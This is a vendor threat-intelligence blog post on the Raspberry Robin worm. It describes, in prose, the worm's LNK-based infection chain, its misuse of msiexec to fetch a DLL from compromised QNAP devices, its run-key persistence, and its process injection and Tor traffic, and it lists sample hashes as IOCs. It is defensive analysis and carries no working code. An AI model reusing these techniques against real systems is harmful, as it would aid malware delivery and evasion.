Insights, news, education and announcements from PolySwarm

Raspberry Robin

Written by PolySwarm Tech Team | Aug 1, 2022 6:21:21 PM



Executive Summary

Cybereason recently reported on Raspberry Robin, a worm that uses LNK shortcuts to lure victims and leverages compromised QNAP devices as stagers.
Key Takeaways

  • Raspberry Robin is a worm associated with LNK Worm.
  • Raspberry Robin spreads via multiple methods, including LNK files, file archives, USB devices, and ISO files.
  • Raspberry Robin leverages QNAP devices as stagers.
  • Raspberry Robin uses process injection into legitimate Windows processes to evade detection.
What is Raspberry Robin?

Raspberry Robin is a worm associated with LNK Worm. The worm spreads over USB devices or shared folders, taking advantage of QNAP devices as stagers. It leverages LNK files, file archives, USB devices, and ISO files to infect victims. Most of the Raspberry Robin targets Cybereason observed were located in Europe.

The Raspberry Robin infection chain begins with two files located on a shared drive or external device. One is an LNK file containing a Windows shell command, and the other is a BAT file containing padding data and two commands. The LNK file triggers the initial infection and executes cmd.exe in quiet mode and normal installation mode. It creates another msiexec.exe /V process launched from services.exe. The second process spawns a third msiexec.exe process, which loads a malicious module, which is the malware stage. The malware uses the msiexec.exe LOLBin to download and execute a malicious DLL file on a compromised QNAP device.

Once a machine is infected, Raspberry Robin maintains persistence by running on startup, using a registry run key to automatically load a malicious module through rundll32.exe. In one of the samples analyzed by Cybereason, the module masqueraded as an Apache shared library file, libapriconv-1.dll. In another sample, the module masqueraded as the QT 5 process. That module was signed but not verified by the Windows system. The code signing name used in that sample was OmniContact.

To evade detection, Raspberry Robin uses process injection into legitimate Windows system processes and uses Tor exit nodes to communicate with threat actor infrastructure over ports 80, 443, and 8080.

IOCs

PolySwarm has multiple samples of Raspberry Robin.

699ad43a53a38e4cf613035b1fcaae94424bedd8d171d6a49828a589df6ea064

1d2c8db9ac6082f32e9178469c2c416e5e170095d7f84a771dbb91192c681598

1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1

C0a13af59e578b77e82fe0bc87301f93fc2ccf0adce450087121cb32f218092c

You can use the following CLI command to search for all Raspberry Robin samples in our portal:

$ polyswarm link list -f RaspberryRobin



Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports